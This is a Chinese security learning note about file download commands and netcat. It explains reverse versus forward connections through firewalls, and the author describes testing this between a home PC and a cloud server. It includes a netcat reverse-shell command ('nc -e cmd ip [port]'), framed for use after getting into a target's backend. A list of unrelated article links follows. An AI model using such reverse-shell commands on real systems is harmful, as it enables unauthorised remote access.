ps:2022.3.3 尝试重新更学习笔记,算是简单总结下所学的,也为之后查阅提供便利。

先谈文件下载
首先,文件下载主要通过棱角来得到linux或者windows不同系统的下载命令

其次NC瑞士军刀
若进入对方后台,可以通过前面所谈到的“文件下载”命令,在提前准备好的文件服务器上下载文件,如nc
通过对方nc反弹shell到自己的cmd上(前提自己这边是公网,如果是内网得做端口映射),相对于自己而言,也称之为反向连接。(正向连接是自己主动发出)

为什么需要反向连接?
因为防火墙的机制——“出去容易,进来很难”
也就是对出去的流量限制宽松,而进来的很严格。所以这也是为什么要反向连接。

对于正向连接的话在关掉对方的防火墙前提下,也容易实现。
而且自己内网是可以直接连通出去外网的,就不像反向连接有限制。

自己实际用服务器来尝试了一下,最后成功了。(实验环境:自己的电脑(内网)以及一台白嫖的华为服务器(外网))
有个需要注意的地方:关掉服务器防火墙之后,也需要修改服务器上的安全组(即开放端口),否则也无法成功。

自己发出请求:nc -e cmd ip [port]
这里是在对方端口监听到的,已经获取自己这边的cmd了,成功。

安全学习笔记(一)-文件下载以及NC相关推荐

  1. Android 学习 笔记_05. 文件下载

    文件下载的步骤: 1.创建一个HttpURLConnection对象 HttpURLConnection urlConn=(HttpURLConnection)url.openConnection() ...

  2. netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell

    NC学习笔记 搭配这个视频链接使用更佳 https://space.bilibili.com/439906928/channel/seriesdetail?sid=231485 基础概念 nc是什么? ...

  3. FreeSWITCH 学习笔记(一)

    [1]FreeSWITCH学习笔记 1.Windows安装包下载地址: http://files.freeswitch.org/windows/installer/ 2.源码下载地址: http:// ...

  4. 好程序员web前端分享Nodejs学习笔记之Stream模块

    好程序员web前端分享Nodejs学习笔记之Stream模块 一,开篇分析 流是一个抽象接口,被 Node 中的很多对象所实现.比如对一个 HTTP 服务器的请求是一个流,stdout 也是一个流.流 ...

  5. linux io100的原因_Linux学习笔记(九)软件包管理

    Linux基础学习笔记精选专栏 目前本专栏包含的内容有: Linux学习笔记(一)使用文本编辑器Vim Linux学习笔记(二)系统基础操作 Linux学习笔记(三)文件和文本的查看 Linux学习笔 ...

  6. OpenCV学习笔记(四十一)——再看基础数据结构core OpenCV学习笔记(四十二)——Mat数据操作之普通青年、文艺青年、暴力青年 OpenCV学习笔记(四十三)——存取像素值操作汇总co

    OpenCV学习笔记(四十一)--再看基础数据结构core 记得我在OpenCV学习笔记(四)--新版本的数据结构core里面讲过新版本的数据结构了,可是我再看这部分的时候,我发现我当时实在是看得太马 ...

  7. java学习笔记8--接口总结

    接着前面的学习: java学习笔记7--抽象类与抽象方法 java学习笔记6--类的继承.Object类 java学习笔记5--类的方法 java学习笔记4--对象的初始化与回收 java学习笔记3- ...

  8. [NOTE] WebGoat v8.2.2学习笔记

    [NOTE] WebGoat v8.2.2学习笔记 文章目录 [NOTE] WebGoat v8.2.2学习笔记 前言 CIA 常见编码形式 OpenSSL使用 docker安全 SQL安全 SQLi ...

  9. 学习笔记之-Activiti7工作流引擎,概述,环境搭建,类关系图,使用Activiti BPMN visualizer,流程变量,组任务 网关,Activiti整合Spring SpringBoot

    本篇学习笔记是观看黑马程序员Activiti7视频而得 Activiti7 一.工作流介绍 1.1 概念 工作流(Workflow),就是通过计算机对业务流程自动化执行管理.它主要解决的是" ...

  10. 《Go语言圣经》学习笔记 第八章 Groroutines和Channels

    <Go语言圣经>学习笔记 第八章 Groroutines和Channels 目录 Goroutines 实例:并发的Clock服务 实例:并发的Echo服务 Channels 并发的循环 ...

最新文章

  1. 启动jar包 服务方式
  2. Windows 7可以体验IE10了
  3. 河北软件职业技术学院计算机专业分数线,河北软件职业技术学院历年分数线 2021河北软件职业技术学院录取分数线...
  4. mysql 分库分表mycat部署
  5. Android渠道打包技术小结
  6. python 全部缩进一行_Python开发工具:缩进规则的使用
  7. 判断包含字符当中包含小数点_Python|提取包含指定文本的行到一个文本文件(字符串或正则)...
  8. 从 DCG 到 IDCG 再到 NDCG
  9. 数商云DMS经销商管理系统解决方案:DMS系统实现业务全渠道、销售数据采集
  10. Webshell 管理工具
  11. 工作遇到问题:通过命令如何控制程控电源的第二个通道
  12. CTU Open Contest 2019 C. Beer Coasters(计算几何)
  13. C++_基础1.1初识——Hellow world
  14. biomarker研究思路
  15. mysql数据库存储生僻字_mysql 生僻字存储
  16. Shopee店铺没有流量?3步教你如何诊断店铺
  17. Android  Windows悬浮窗
  18. 【HDU 杭电 5671 Matrix】
  19. 看Youtube怎么利用深度学习做推荐
  20. 老司机谈鉴黄,新一代“鉴黄师”是如何养成的?

热门文章

  1. hive循环语句_Hive 如何方便地实现存储过程?
  2. python 将txt文件转换为excel_Python学习笔记-Txt文件转Excel文件
  3. bp网络拟合函数 matlab_神经网络案例分析—基于Matlab的预测
  4. 艾蔻智能机器人怎么连接网络_智能建筑背后的关键技术:无处不在的网络连接...
  5. android调weex方法,Android集成weex汇总
  6. java控制结构_Java 控制结构与方法
  7. java 加入音乐_如何实现java插入背景音乐
  8. (10)二进制文件方式部署Kubernetes高可用集群----------部署node节点
  9. WPF换肤之三:WPF中的WndProc
  10. pytorch基础教程2